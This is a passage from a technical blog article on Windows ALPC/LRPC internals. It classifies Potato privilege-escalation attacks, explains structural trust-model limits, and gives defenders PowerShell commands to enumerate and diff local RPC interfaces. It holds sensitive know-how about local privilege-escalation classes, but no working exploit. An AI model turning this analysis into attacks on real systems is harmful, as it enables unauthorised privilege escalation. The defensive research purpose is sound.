&lt;td&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; plus the ability to direct the service to connect to the attacker&apos;s pipe&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Canonical exemplars&lt;/td&gt;
&lt;td&gt;RoguePotato (May 2020) [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato&lt;/td&gt;
&lt;td&gt;PrintSpoofer (2020) [@itm4n-printspoofer], EfsPotato, PetitPotam&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Post-KB5004442 status&lt;/td&gt;
&lt;td&gt;OXID redirection to remote hosts blocked by &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; enforcement, March 2023 [@mssupport-kb5004442]&lt;/td&gt;
&lt;td&gt;Unchanged at the OS level; mitigation is &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; hygiene&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Underlying IPC fabric&lt;/td&gt;
&lt;td&gt;LRPC on ALPC&lt;/td&gt;
&lt;td&gt;Named pipes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The HITB Amsterdam 2021 talk &lt;em&gt;The Rise of Potatoes: Privilege Escalation in Windows Services&lt;/em&gt; by Andrea Pierini and Antonio Cocomazzi [@hitb-potatoes] is the canonical end-to-end family classification. Pierini and Cocomazzi are also the disclosers of RoguePotato [@roguepotato-blog] -- the variant that broke the post-Windows-10-1809 mitigation by redirecting the OXID resolver to an attacker-controlled host on a port other than 135. The disclosure was May 11, 2020, building on their December 6, 2019 &quot;RogueWinRM&quot; precursor work [@roguewinrm-blog] in which they obtained a SYSTEM identification token but not yet a usable impersonation token.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Does the writeup say &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; or &lt;code&gt;RpcImpersonateClient&lt;/code&gt;? The first is a named-pipe primitive. The second is an LRPC-on-ALPC primitive. The trigger transport may be shared (DCOM activation, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises -- and which mitigation closes it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The KB5004442 DCOM hardening rollout [@mssupport-kb5004442], which addresses CVE-2021-26414, completed phase 3 on March 14, 2023. Phase 3 enabled the hardening with no override path: DCOM activations are subject to &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; as a mandatory minimum, and the previously available registry overrides were removed. The OS-default configuration since March 2023 closes the JuicyPotato variant that depended on outbound DCOM to TCP/135 with downgraded authentication. RoguePotato and its descendants survived the rollout because they did not depend on the downgrade -- they depend on the OXID redirect itself, which the hardening did not block at the OS-default configuration.&lt;/p&gt;

Two adjacent kernel-IPC primitives deserve a footnote. The Windows Notification Facility (WNF) is a kernel-mode publish-subscribe channel for one-way state notifications [@tob-wnf]; processes register interest in named &quot;state names&quot; and the kernel delivers updates. Event Tracing for Windows (ETW) is the kernel&apos;s one-way event-streaming substrate [@tob-etw]; providers emit structured events, controllers configure sessions, and consumers read the events back. Yarden Shafir&apos;s Trail of Bits posts on both are the canonical practitioner references for the architectural-cousin framing. Neither WNF nor ETW competes with LRPC for the request-reply use case, because neither is request-reply. They are family of ALPC -- kernel-mediated message buses -- but they solve different problems.
&lt;p&gt;The comparison matrix gives us the surface area of competing primitives. The next section asks: given this surface area, what can the OS structurally not guarantee?&lt;/p&gt;
&lt;h2&gt;9. The Limits -- Three Things ALPC and LRPC Structurally Cannot Enforce&lt;/h2&gt;
&lt;p&gt;The Vista redesign closed half the structural problem of LPC. It left three other things permanently open, and no future ALPC version can close them without a new ABI. Each of the three is a property of the trust model, not a bug in any specific server. Each has a CVE-history footprint that confirms the structural framing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The interface-callback gate cannot be enforced by the OS.&lt;/strong&gt; The &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; contract [@msdocs-rpcregisterif2] accepts a function pointer into the application&apos;s address space; the runtime trusts whatever the callback returns. The OS-side enforcement available without an ABI change is at most &quot;invoke the callback&quot; (which &lt;code&gt;RPC_IF_SEC_NO_CACHE&lt;/code&gt; [@msdocs-ifflags] already enforces on every call). The OS cannot read the callback&apos;s source, cannot infer its policy, and cannot decide whether the callback&apos;s verdict matches what the application&apos;s specification says it should be. Every interface-callback EoP -- CVE-2019-1162 MSCTF [@ormandy-ctf-2019], the PPL-COM class [@forshaw-com-ppl-2018], CVE-2018-8440 [@nvd-cve-2018-8440] -- is a structural instance of this bound. Closing it requires either inventing a declarative authorization ABI the OS can validate, or sandboxing callback execution. Neither has been proposed as a stable Microsoft direction in any public artefact through 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;There is no transitive caller identity.&lt;/strong&gt; ALPC&apos;s Security message attribute captures the caller&apos;s token at handshake or on demand; it does not carry a chain of trust across multiple hops. A proxy server in the middle of a call chain has to impersonate explicitly or marshal identity in band, and the receiving party at the far end has no kernel primitive that tells it &quot;the message came from caller A, was forwarded by proxy B, and the original token is still attached.&quot; Confused-deputy attacks in the LRPC fabric are not bugs; they are an inherent property of the trust model. The DCOM-activation Potato class [@roguepotato-blog] [@roguepotato-repo] exploits exactly this property: the DCOM activator passes a token into a privileged COM server, and the server cannot reliably tell whether the token chain on the way in matches what the activator&apos;s specification said it should be.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The kernel routing path is in the trusted computing base.&lt;/strong&gt; The ALPC dispatcher runs in Ring 0. Any bug in &lt;code&gt;_ALPC_PORT&lt;/code&gt; object lifecycle, in &lt;code&gt;_ALPC_HANDLE_DATA&lt;/code&gt; reference counting, in message-attribute marshalling, or in any of the dozens of structures Geoff Chappell&apos;s site [@chappell-alpc] [@chappell-alpcp] documents but Microsoft does not, is a direct kernel-elevation primitive. The CVE history demonstrates the assumption is wishful: CVE-2018-8440 [@nvd-cve-2018-8440] has a kernel reference-counting flavour in addition to the well-known interface-callback flavour, and several of the Patch-Tuesday ALPC EoP advisories of 2020-2024 carry NVD descriptions that say &quot;improperly handles calls to Advanced Local Procedure Call (ALPC)&quot; with no further detail because the underlying bug is a kernel bookkeeping issue Microsoft does not enumerate. The kernel routing path is settled engineering by any reasonable standard, but settled engineering is not zero-bug engineering. A new ALPC CVE in any given Patch Tuesday is consistent with the structural model.&lt;/p&gt;

flowchart TD
    A[The interface-callback gate -- the OS cannot validate the callback body] --&amp;gt; D[Patch-Tuesday treadmill -- interface callback CVEs, integrity-level CVEs, kernel ALPC CVEs]
    B[No transitive caller identity -- ALPC has no chain-of-trust primitive across hops] --&amp;gt; D
    C[The kernel routing path is in the TCB -- any _ALPC_PORT or attribute bug is a direct kernel EoP] --&amp;gt; D
&lt;p&gt;There is a fourth observation that is not an impossibility result but is worth stating in the same breath: &lt;strong&gt;the practical upper bound on local authentication strength&lt;/strong&gt;. &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; is the practical ceiling for local LRPC; the &lt;code&gt;ncalrpc&lt;/code&gt; transport supports only &lt;code&gt;RPC_C_AUTHN_WINNT&lt;/code&gt; authentication [@msdocs-protseq], and the strongest integrity check the runtime offers under that authentication service is packet integrity. The KB5004442 DCOM rollout [@mssupport-kb5004442] raised the &lt;em&gt;minimum&lt;/em&gt; for DCOM activations to &lt;code&gt;PKT_INTEGRITY&lt;/code&gt; in March 2023; it did not change the &lt;em&gt;ceiling&lt;/em&gt;. The gap between upper and lower bounds is substantial and structural: raising mandatory authentication closes the unauthenticated vector and leaves the authenticated-but-unauthorized vector -- the interface-callback class -- wide open.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The OS can require that the callback runs. It cannot require that the callback returns the right answer. The Patch-Tuesday treadmill is the consequence.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CVE-2017-11783, CVE-2018-8440, and CVE-2019-1162 were the canonical exemplars of the interface-callback class. They were not unlucky outliers from an otherwise sound engineering effort. They are instances of a class the design of &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; cannot exclude. Almost every subsequent year of Patch Tuesdays has shipped further instances of the same class, and 2026&apos;s count is on track to be no smaller than 2018&apos;s.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Closing the interface-callback gap would look like one of two architectural shifts. Either Microsoft would introduce a declarative authorization language for RPC interfaces -- a manifest the application ships alongside the IDL that the runtime can parse and the OS can validate -- and then forbid the imperative callback. Or the runtime would execute the callback inside a sandbox that constrains what the callback can do (no arbitrary memory reads of the service&apos;s address space, no ability to issue privileged syscalls, no ability to side-channel through global state). Neither is on a publicly-named Microsoft roadmap; the closest public artefact is Forshaw&apos;s ongoing tooling work on parsing the interface inventory [@forshaw-saatools] [@forshaw-rpc-2019] [@forshaw-poc2023], which equips defenders to audit the callbacks they have rather than to replace the model.&lt;/p&gt;
&lt;p&gt;The limits are honest. They are also not the whole story. Research has not stopped trying to close the gap, and the next section names what is still active.&lt;/p&gt;
&lt;p&gt;The Patch-Tuesday treadmill is the &lt;em&gt;expected&lt;/em&gt; steady state, not a transitional embarrassment. Closing the class requires reworking the contract -- a different ABI, or a sandboxed execution model -- and no public Microsoft roadmap commits to either.&lt;/p&gt;
&lt;h2&gt;10. Open Problems and a Practical Field Guide (2024-2026)&lt;/h2&gt;
&lt;p&gt;The 2024-2026 conference cycle is still arguing about how to make the interface-callback class scalable to defend. This section enumerates the open problems and then closes with the practical workflow a defender or an in-house RPC author can run today. The practical recipe is in part an answer to the open problems.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 1: public RPC fuzzing at Microsoft-internal scale.&lt;/strong&gt; The public ceiling is RPCForge [@rpcforge] for NDR-aware fuzzing, Forshaw&apos;s &lt;code&gt;NtObjectManager&lt;/code&gt; for interface inventory and client generation [@forshaw-saatools] [@forshaw-rpc-2019], and the November 2023 PoC talk &lt;em&gt;Building More Windows RPC Tooling for Security Research&lt;/em&gt; [@forshaw-poc2023] for the latest research-tooling continuation. Microsoft&apos;s internal pipeline is not public; whether a coverage-guided NDR64 fuzzer can become a small-team repeatable Patch-Tuesday tool is open.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 2: auditing the interface-registration model for structural permissiveness.&lt;/strong&gt; A defender using &lt;code&gt;Get-RpcServer&lt;/code&gt; can enumerate every LRPC interface on a Windows install and dump each interface&apos;s procedures and security descriptor. The defender cannot tell, without per-interface manual review, whether a registered callback is correct. Heuristic detection of NULL &lt;code&gt;IfCallbackFn&lt;/code&gt; is mechanical; detection of &lt;em&gt;semantically&lt;/em&gt; permissive callbacks -- callbacks whose body trusts a field the caller controls -- is open and probably AI-shaped.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 3: &lt;code&gt;RPC_IF_SEC_NO_CACHE&lt;/code&gt; adoption and cost.&lt;/strong&gt; No public catalogue of which Microsoft services use the flag exists. No per-call cost benchmark is published. Defender heuristics that recommend the flag for high-risk interfaces cannot quantify the performance trade-off they are recommending.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 4: the local-COM-over-LRPC bypass class.&lt;/strong&gt; Forshaw&apos;s 2018 PPL-COM post [@forshaw-com-ppl-2018] articulated a class of attack against Protected Process Light that continues to surface in CVE reports. The structural class is unaddressed at the OS level.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 5: ALPC as covert channel.&lt;/strong&gt; The CVE-2019-1162 MSCTF fix [@ormandy-ctf-2019] narrowed the MSCTF subsystem&apos;s exposure. The general class of &quot;shared system ALPC ports that ignore caller integrity&quot; is structural; identifying others requires the kind of systematic audit Open Problem 2 names.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 6: defender SOC integration of the &lt;code&gt;Microsoft-Windows-Kernel-ALPC&lt;/code&gt; &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;ETW provider&lt;/a&gt;&lt;/strong&gt; [@msdocs-etwsys]. The provider is high-volume; production SOC pipelines rarely subscribe to it because the event rate overwhelms commodity collection. Per-call ALPC visibility today is concentrated inside &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;EDR vendors&lt;/a&gt; that gate it behind antimalware-PPL processes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 7: AppContainer-aware RPC capability checking.&lt;/strong&gt; &lt;code&gt;RpcServerRegisterIf3&lt;/code&gt; [@msdocs-rpcregisterif3] introduces an AppContainer default-deny, but there is no standard pattern for in-house service authors who want to express &quot;this procedure requires capability X.&quot; Service authors roll their own; some get it right.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Author / Org&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;NtObjectManager&lt;/code&gt; / &lt;code&gt;NtCoreLib&lt;/code&gt; (formerly &lt;code&gt;NtApiDotNet&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;LRPC interface enumeration, decompilation, and client generation from PowerShell or .NET&lt;/td&gt;
&lt;td&gt;James Forshaw, Project Zero&lt;/td&gt;
&lt;td&gt;[@forshaw-saatools] [@forshaw-rpc-2019]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RpcView&lt;/td&gt;
&lt;td&gt;Qt5/C++ GUI for browsing RPC servers and decompiled interface metadata across Windows versions&lt;/td&gt;
&lt;td&gt;silverf0x&lt;/td&gt;
&lt;td&gt;[@rpcview-repo]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPC Investigator&lt;/td&gt;
&lt;td&gt;.NET Forms UI built on &lt;code&gt;NtApiDotNet&lt;/code&gt; for enumeration, client workbench, and an &quot;RPC Sniffer&quot; ETW-backed live view&lt;/td&gt;
&lt;td&gt;Trail of Bits, January 2023&lt;/td&gt;
&lt;td&gt;[@tob-rpcinv-blog] [@rpcinv-repo]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPCMon&lt;/td&gt;
&lt;td&gt;ETW-based GUI for scanning RPC communication, built like Sysinternals Procmon, depending on Forshaw&apos;s library&lt;/td&gt;
&lt;td&gt;CyberArk Labs&lt;/td&gt;
&lt;td&gt;[@rpcmon-repo]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPCForge&lt;/td&gt;
&lt;td&gt;NDR-aware local Python fuzzer for ALPC-exposed RPC interfaces&lt;/td&gt;
&lt;td&gt;Clement Rouault and Thomas Imbert, Sogeti ESEC&lt;/td&gt;
&lt;td&gt;[@rpcforge]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Forshaw NDR64 / RPC research pipeline (2023)&lt;/td&gt;
&lt;td&gt;Continued research tooling and conference materials&lt;/td&gt;
&lt;td&gt;James Forshaw&lt;/td&gt;
&lt;td&gt;[@forshaw-poc2023]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;The practical field guide.&lt;/strong&gt; Eight numbered actions for the defender or in-house RPC service author. Each cites a verified source the reader can re-read in full.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. &lt;strong&gt;Enumerate registered LRPC interfaces&lt;/strong&gt; with &lt;code&gt;Install-Module NtObjectManager; Get-RpcServer ... | Where-Object { $_.Endpoints.ProtocolSequence -eq &apos;ncalrpc&apos; }&lt;/code&gt; [@forshaw-saatools] [@forshaw-rpc-2019]. Snapshot before and after Patch Tuesday and diff on (UUID, procedure list, security descriptor). 2. &lt;strong&gt;Enumerate live ALPC server ports&lt;/strong&gt; with &lt;code&gt;Get-NtAlpcServer&lt;/code&gt;. The cmdlet returns the named connection ports; the unnamed per-connection ports are not enumerable by design (see Section 4) [@forshaw-saatools]. 3. &lt;strong&gt;Reach a local RPC server from PowerShell&lt;/strong&gt; with Forshaw&apos;s &lt;code&gt;New-RpcClient&lt;/code&gt; cmdlet, which generates a &lt;code&gt;[NtCoreLib.Win32.Rpc.Client]&lt;/code&gt;-derived class from the parsed server metadata [@forshaw-rpc-2019]. This is the primitive that lets a Patch-Tuesday differential become an actual interaction. 4. &lt;strong&gt;Audit your own RPC service&lt;/strong&gt; for the canonical mistake: any &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; or &lt;code&gt;RpcServerRegisterIf3&lt;/code&gt; call with a NULL &lt;code&gt;IfCallbackFn&lt;/code&gt; argument is &quot;anyone who can open the port can call any procedure on the interface&quot; [@msdocs-rpcregisterif2] [@msdocs-rpcregisterif3]. Treat NULL callbacks as a finding, not a default. 5. &lt;strong&gt;Harden an exposed LRPC interface&lt;/strong&gt; with the flag combination &lt;code&gt;RPC_IF_ALLOW_SECURE_ONLY | RPC_IF_SEC_NO_CACHE&lt;/code&gt; plus an explicit callback that validates &lt;code&gt;I_RpcBindingInqLocalClientPID&lt;/code&gt; and the caller&apos;s token integrity level [@msdocs-ifflags]. The Microsoft Learn note that &quot;Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user&quot; [@msdocs-ifflags] makes the explicit callback non-optional. 6. &lt;strong&gt;For DCOM-activated services&lt;/strong&gt;, accept the KB5004442 default (&lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; minimum) and do not invoke registry overrides. The override path was removed in the March 14, 2023 phase 3 rollout [@mssupport-kb5004442]. 7. &lt;strong&gt;For runtime visibility&lt;/strong&gt;, enable the Microsoft-Windows-RPC ETW provider via RPCMon [@rpcmon-repo] or RPC Investigator&apos;s RPC Sniffer [@tob-rpcinv-blog] [@rpcinv-repo]; correlate per-process per-procedure call rates against the service inventory from step 1. 8. &lt;strong&gt;For per-message kernel-level visibility&lt;/strong&gt;, enable the Microsoft-Windows-Kernel-ALPC system provider from an &lt;code&gt;EVENT_TRACE_SYSTEM_LOGGER_MODE&lt;/code&gt; session [@msdocs-etwsys]. Budget for the documented high-volume warning; consider an EDR vendor that runs the provider already if you do not want to host the collection yourself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Real shell pipeline that produces the inputs:
//   Get-RpcServer | Export-Clixml -Path C:\\Snaps\\rpc-pre-patch.xml
//   
//   Get-RpcServer | Export-Clixml -Path C:\\Snaps\\rpc-post-patch.xml
//   Compare-Object (Import-Clixml C:\\Snaps\\rpc-pre-patch.xml) ...
// The diff logic below is what Compare-Object is doing under the hood, in plain JS.&lt;/p&gt;
&lt;p&gt;const pre = new Map([
  [&apos;201ef99a-7fa0-444c-9399-19ba84f12a1a&apos;, [&apos;Activate&apos;,&apos;Cancel&apos;,&apos;Continue&apos;,&apos;GetElevationType&apos;]],
  [&apos;86d35949-83c9-4044-b424-db363231fd0c&apos;, [&apos;SchRpcRegisterTask&apos;,&apos;SchRpcRetrieveTask&apos;,&apos;SchRpcSetSecurity&apos;]],
  [&apos;e1af8308-5d1f-11c9-91a4-08002b14a0fa&apos;, [&apos;ept_lookup&apos;,&apos;ept_map&apos;,&apos;ept_insert&apos;]],
]);&lt;/p&gt;
&lt;p&gt;const post = new Map([
  [&apos;201ef99a-7fa0-444c-9399-19ba84f12a1a&apos;, [&apos;Activate&apos;,&apos;Cancel&apos;,&apos;Continue&apos;,&apos;GetElevationType&apos;,&apos;RequestElevation2&apos;]],
  [&apos;86d35949-83c9-4044-b424-db363231fd0c&apos;, [&apos;SchRpcRegisterTask&apos;,&apos;SchRpcRetrieveTask&apos;,&apos;SchRpcSetSecurityV2&apos;]],
  [&apos;e1af8308-5d1f-11c9-91a4-08002b14a0fa&apos;, [&apos;ept_lookup&apos;,&apos;ept_map&apos;,&apos;ept_insert&apos;]],
]);&lt;/p&gt;
&lt;p&gt;const interfaces = new Set([...pre.keys(), ...post.keys()]);
for (const uuid of interfaces) {
  const a = new Set(pre.get(uuid) || []);
  const b = new Set(post.get(uuid) || []);
  const added   = [...b].filter(p =&amp;gt; !a.has(p));
  const removed = [...a].filter(p =&amp;gt; !b.has(p));
  if (added.length || removed.length) {
    console.log(`Interface ${uuid}`);
    if (added.length)   console.log(&apos;  + added:   &apos; + added.join(&apos;, &apos;));
    if (removed.length) console.log(&apos;  - removed: &apos; + removed.join(&apos;, &apos;));
  }
}
`}&lt;/p&gt;
&lt;p&gt;RPCMon ships a hard-coded RPC interface dictionary named &lt;code&gt;RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json&lt;/code&gt; [@rpcmon-repo] -- a snapshot of Windows 10 1909 build 18363.1977 -- as the baseline against which it labels traced interfaces. The choice to bake in a build-specific baseline is evidence of how often the inventory needs refreshing: a defender running RPCMon on Windows 11 23H2 in 2026 is looking up call sites against a six-year-old dictionary. The accompanying tooling Forshaw built makes the regeneration mechanical in principle; the burden of &lt;em&gt;running&lt;/em&gt; the regeneration is what stays on the defender.&lt;/p&gt;

Install Forshaw&apos;s module and dump every local-only RPC interface on the current Windows install, one row per interface, sorted by procedure count:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Install-Module NtObjectManager -Scope CurrentUser
Get-RpcServer -DbgHelpPath &quot;$env:ProgramFiles\Debugging Tools for Windows\dbghelp.dll&quot; |
  Where-Object { $_.Endpoints.ProtocolSequence -eq &apos;ncalrpc&apos; } |
  Sort-Object { $_.Procedures.Count } -Descending |
  Select-Object Name, InterfaceId, @{N=&apos;Procs&apos;;E={$_.Procedures.Count}} |
  Format-Table -AutoSize
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Expect dozens of named interfaces on a clean Windows 11 install. Save the output, install Patch Tuesday, run it again, and &lt;code&gt;Compare-Object&lt;/code&gt; the two snapshots. That diff is the canonical research workflow that the December 2019 Project Zero post [@forshaw-rpc-2019] introduced.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

The single most effective change an in-house LRPC author can make tomorrow morning is to move from `RpcServerRegisterIf2` with `IfCallbackFn = NULL` to `RpcServerRegisterIf3` with both an explicit per-interface security descriptor and a callback that explicitly validates caller identity. The migration is mechanical -- the function signatures are upward-compatible -- and the runtime check the `If3` API adds gives the application a per-call enforcement gate that does not depend on the application&apos;s callback being correct. Pair it with `RPC_IF_SEC_NO_CACHE` if the callback inspects token state that can change during a session (group membership, integrity level, AppContainer SID).
&lt;p&gt;The practical recipe answers the everyday question: what do I do tomorrow morning? The misconceptions section answers a harder question: what should I stop believing?&lt;/p&gt;
&lt;h2&gt;11. FAQ -- Six Misconceptions, Removed&lt;/h2&gt;
&lt;p&gt;Half the operational confusion about ALPC and LRPC comes from premises that sound plausible and are wrong. This section names six of them. Each answer starts with the wrong answer, explicitly, before correcting it.&lt;/p&gt;

Wrong answer: yes. Right answer: every service that exposes an LRPC interface is. Services that expose only `ncacn_np` (named-pipe RPC) or `ncacn_ip_tcp` (TCP RPC) are not reachable over ALPC, even when the caller is on the same machine [@msdocs-protseq]. The print spooler, for example, exposes its primary interface over named pipes and is the trigger for several of the named-pipe-Potato attacks; AppInfo, Task Scheduler, and the endpoint mapper expose theirs over LRPC and are reachable through the kernel ALPC fabric. The right mental model is &quot;every Windows service that wants to be reachable locally with first-class kernel-mediated transport uses LRPC on ALPC&quot;, not &quot;every service uses ALPC.&quot;

Wrong answer: yes. Right answer: the DCOM-activation Potatoes (RoguePotato [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato) exercise LRPC-on-ALPC because local DCOM activation rides that fabric; the impersonation primitive is `RpcImpersonateClient` inside the activated COM server. The named-pipe Potatoes (EfsPotato, PrintSpoofer [@itm4n-printspoofer], PetitPotam) use `ImpersonateNamedPipeClient` [@msdocs-impnp] as the impersonation primitive and exercise the named-pipe fabric. The trigger transport can be shared (DCOM, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises. See Section 8 for the 30-second classifier and the HITB 2021 Pierini and Cocomazzi talk [@hitb-potatoes] for the canonical end-to-end family classification.

Wrong answer: yes. Several secondary writeups (and the original input premise for this article) say so. Right answer: named connection ports have Object Manager names, typically under `\RPC Control` or per-session AppContainer subtrees. The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles. This is the structural correction Section 4 walks in full and the load-bearing invariant the Vista redesign rests on: only the parties that completed the handshake can address the per-connection channel. The kernel does not let anyone else find it because there is no name to find.

Wrong answer: yes, it is in the SDK. Right answer: partially. Microsoft *does not* publish a Win32 or WDK API reference for the `Nt*Alpc*` and `Alpc*` surface; the de facto syscall reference is NtDoc [@ntdoc-ntalpc], and the de facto structure reference is Geoff Chappell&apos;s site [@chappell-alpc] [@chappell-alpcp]. Microsoft *does* document ALPC architecturally in *Windows Internals 7th Edition Part 2* [@wininternals-7e], Chapter 8 section &quot;Advanced local procedure call (ALPC)&quot;; through the `Microsoft-Windows-Kernel-ALPC` ETW provider [@msdocs-etwsys]; and indirectly through the user-mode RPC runtime documentation. The documentation gap is a deliberate choice -- Microsoft&apos;s position is that application authors should use the RPC runtime, not the kernel ALPC API -- and the gap is the reason the public knowledge of ALPC comes from a handful of named researchers reverse-engineering it.

Wrong answer: yes, the abbreviations collide so they must be related. Right answer: LPC was the original Windows NT 3.1-through-Server-2003 kernel IPC primitive, replaced by ALPC in Vista (November 2006) and removed from the kernel by Windows 7 [@csandker-alpc]. LRPC is the Microsoft RPC runtime&apos;s *transport* selected when `ncalrpc` is the protocol sequence [@msdocs-protseq]; it has always lived inside `rpcrt4.dll`, and it rides on top of kernel ALPC ports. The two entities are at different layers (kernel object vs user-mode transport) and were named a decade apart -- LRPC in 1994, ALPC in 2006. The abbreviation collision is real; the entities are not the same thing.

Wrong answer: on the Trail of Bits blog. Right answer: it does not exist under that title. The input premise for this article (and several AI-generated summaries circulating in 2024-2025) referenced a *Trail of Bits &quot;ALPC Internals&quot; series* by Shafir. The Trail of Bits author page for Yarden Shafir [@tob-shafir-author] lists her actual posts; the kernel-IPC posts are *Introducing Windows Notification Facility&apos;s WNF Code Integrity* (May 2023) [@tob-wnf] and *ETW Internals for Security Research and Forensics* (November 2023) [@tob-etw]. Her dedicated ALPC material lives in her conference training surface, indexed via the Winsider Seminars author page [@winsider-yarden]. The cousin posts (WNF and ETW) are the right Trail of Bits citations for the architectural-cousin framing.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Three sources are worth the rest of an afternoon. Christian Sandker&apos;s three-part &lt;em&gt;Offensive Windows IPC&lt;/em&gt; series [@csandker-alpc] [@csandker-rpc] [@csandker-np] is the highest-signal practitioner walkthrough of LPC, ALPC, LRPC, and named pipes available for free on the open web. &lt;em&gt;Windows Internals 7th Edition Part 2&lt;/em&gt; Chapter 8 section &lt;em&gt;Advanced local procedure call (ALPC)&lt;/em&gt; [@wininternals-7e] is the Microsoft-blessed architectural reference; cite by ISBN 978-0-13-546238-6. James Forshaw&apos;s December 17, 2019 Project Zero post &lt;em&gt;Calling Local Windows RPC Servers from .NET&lt;/em&gt; [@forshaw-rpc-2019] is the canonical introduction to the &lt;code&gt;NtObjectManager&lt;/code&gt; tooling and the methodology change it unlocked. For the sister-article context in this series: the Object Manager Namespace post explains the &lt;code&gt;\RPC Control&lt;/code&gt; parent that every named ALPC connection port lives under, and the upcoming Potato sister post walks the DCOM-activation and named-pipe sub-families through to a working PoC.&lt;/p&gt;
&lt;/blockquote&gt;

The kernel did its job at the port-DACL layer. The application disclaimed responsibility at the interface-callback layer. Almost every Patch-Tuesday LRPC fix since 2018 is some recombination of those two halves, and the half the kernel cannot fix is the half that keeps shipping.
&lt;p&gt;The named-researcher canon for ALPC -- Forshaw, Shafir, csandker, Cerrudo, Cocomazzi, Pierini, Rouault, Imbert, Ormandy, Chappell -- is what this article is an attempt to read in one place.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;alpc-and-lrpc-the-local-ipc-fabric-under-every-windows-service&quot; keyTerms={[
  { term: &quot;ALPC&quot;, definition: &quot;Advanced Local Procedure Call. The Vista-and-later kernel asynchronous message-and-attribute IPC primitive; replaces classic LPC. Microsoft does not publish a developer-facing reference for the kernel surface.&quot; },
  { term: &quot;LRPC&quot;, definition: &quot;The Microsoft RPC runtime&apos;s local-only transport, selected when the protocol sequence is &lt;code&gt;ncalrpc&lt;/code&gt;. Implemented in &lt;code&gt;rpcrt4.dll&lt;/code&gt;; rides on top of ALPC ports.&quot; },
  { term: &quot;LPC&quot;, definition: &quot;Local Procedure Call. The original NT 3.1 kernel IPC primitive, synchronous, three-port; replaced by ALPC in Vista and removed from the kernel by Windows 7.&quot; },
  { term: &quot;Connection port (ALPC)&quot;, definition: &quot;The named ALPC port a server creates so clients can find it. Lives in the Object Manager namespace, typically under &lt;code&gt;\\RPC Control&lt;/code&gt;.&quot; },
